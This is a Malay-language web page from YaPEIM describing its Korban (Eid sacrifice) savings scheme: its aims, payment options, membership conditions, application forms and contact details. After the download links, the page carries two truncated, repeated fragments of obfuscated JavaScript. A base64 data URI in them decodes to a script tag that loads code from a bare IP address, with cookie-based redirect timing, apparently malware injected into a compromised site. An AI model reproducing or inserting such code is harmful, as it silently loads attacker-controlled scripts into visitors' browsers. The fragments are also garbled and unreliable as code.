YaPEIM » Skim Ibadah Korban YaPEIM Untuk Semua!

Terkini

Skim Ibadah Korban YaPEIM Untuk Semua!

Skim Ibadah Korban

Latar Belakang

Skim Ibadah Korban YaPEIM diperkenalkan oleh YaPEIM pada tahun 2011. Skim ini dikendalikan oleh Koperasi Ibadah Korban YaPEIM Berhad yang ditubuh dan didaftarkan oleh YaPEIM di bawah Suruhanjaya Koperasi Malaysia.

Tujuan utama YaPEIM memperkenalkan Program dan Skim Ibadah Korban YaPEIM adalah untuk :-
a) meningkatkan kesedaran dan penyertaan masyarakat dalam pelaksanaan ibadah korban secara terancang.
b) menyediakan kemudahan tabungan bayaran korban secara ansuran.
c) melaksana dan mengagihkan daging korban secara terancang untuk manfaat yang optimum kepada masyarakat Muslim di negara serantau.

Kemudahan Di Bawah Skim

Skim Ibadah Korban YaPEIM menyediakan kemudahan dan pilihan berikut kepada anggota/peserta :-

Tabungan/bayaran penyertaan secara :
a) ansuran bulanan/berkala/tidak berkala
b) sekaligus

Pakej Ibadah Korban

Kemudahan lain yang disediakan bersama ibadah korban:
a) Ibadah Aqiqah
b) Fidyah/Kifarah
c) Sumbangan Amal Jariah (seperti untuk kenduri /dapur umum)
d) Ziarah/Lawatan (tempat/negara Ibadah Korban dilaksanakan)

Syarat Menyertai Skim

Skim ini terbuka kepada semua lapisan masyarakat. Pemohon di syaratkan memenuhi syarat-syarat berikut :-

a) menjadi anggota Koperasi Ibadah Korban YaPEIM Berhad.
b) menerima dan mematuhi Undang-Undang Kecil Koperasi dan Aturan-aturan di bawahnya.

Kadar Bayaran

1. Kadar harga ini adalah tertakluk kepada perubahan berdasarkan kadar harga semasa dan setempat. Pihak koperasi akan menghubungi anggota untuk memaklum dan mendapatkan persetujuan dan pengesahan anggota berkaitan pada bulan Sya’aban tahun berkenaan bagi pelaksanaan ibadah korban pada tahun berkenaan.
2. Makluman dan tawaran penyertaan akan dibuat sekiranya ternakan korban selain dari lembu dan kambing disediakan pada tahun berkenaan.

Sumbangan Amal Jariah :
Berdasarkan keupayaan dan keikhlasan penyumbang/anggota.

Ziarah/Lawatan :
Tertakluk kepada kos sebenar (perjalanan, penginapan dan tempat/lokasi lawatan).

Bayaran :

Semua bayaran hendaklah dibuat atas nama/kepada Koperasi Ibadah Korban YaPEIM Berhad (berdasarkan tujuan dan kaedah bayaran tersebut).

Cara Memohon / Menyertai Koperasi dan Skim

Sesiapa yang berhasrat menganggotai Koperasi Ibadah Korban YaPEIM Berhad boleh memohon pada bila-bila masa dengan memenuhi Borang Permohonan Keanggotaan No. KIKYB-01 dan mengembalikannya ke pejabat Koperasi untuk pertimbangan dan kelulusan Koperasi.

Pemohon/anggota yang hendak menyertai Skim dan mewakili peserta/ pelaksana Ibadah Korban/Aqiqah hendaklah memenuhi Borang Persetujuan Penyertaan Dalam Skim Ibadah Korban No. KIKYB-02 dan mengembalikannya ke pejabat Koperasi untuk tindakan lanjut.

Sekiranya di perlukan perkhidmatan dan kemudahan lain di bawah Pakej Ibadah Korban atau sebarang maklumat, borangborang berkaitan dan keterangan lanjut sila hubungi pejabat Koperasi seperti berikut :

Setiausaha
Koperasi Ibadah Korban YaPEIM Berhad
No. 52, Bangunan YaPEIM
Jalan Kampung Attap
Beg Berkunci 11012
50732 Kuala Lumpur
No Telefon : 03-2260 3882 / 03-22743884  (En Azmi Sadeli/ Pn. Norashikin Abd Rahman)

No Faks: 03-2274 3883

Pelaksanaan Program

Tempat pelaksanaan ibadah korban tahun berkenaan (pada 10, 11, 12 dan 13 Zulhijjah) di dalam dan luar negara disenaraikan oleh Koperasi untuk pemilihan anggota mengambilkira keutamaan berikut :

a) lingkungan negara serantau
b) kepadatan/ramai penduduk berpendapatan rendah
c) kurang/tiada pelaksana lain di tempat berkenaan
d) kawasan bencana/musibah
e) kawasan komuniti minoriti muslim (di luar negara)

Urusan penyembelihan dan agihan daging korban dikawal selia oleh Koperasi. Anggota boleh menghubungi Koperasi jika ingin turut serta.
Pelaksanaan perkhidmatan di bawah pakej seperti penyerahan Sumbangan Amal Jariah, kenduri rakyat, dapur umum dan ziarah diatur berdasarkan permintaan anggota dan perkembangan semasa.
Sijil Pengesahan Pelaksanaan akan dihantar kepada anggota/ peserta berkenaan dalam tempoh sebulan selepas pelaksanaan.

Manfaat

Perancangan dan pelaksanaan program secara terancang dan teratur insya Allah akan memberi manfaat yang optimum sekaligus sebagai pemangkin dalam usaha meningkatkan kualiti dan martabat ummah.

-> Klik di sini untuk muat turun info lengkap berkaitan Skim Ibadah Korban YaPEIM.
-> Klik di sini untuk muat turun Borang Skim Ibadah Korban YaPEIM.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top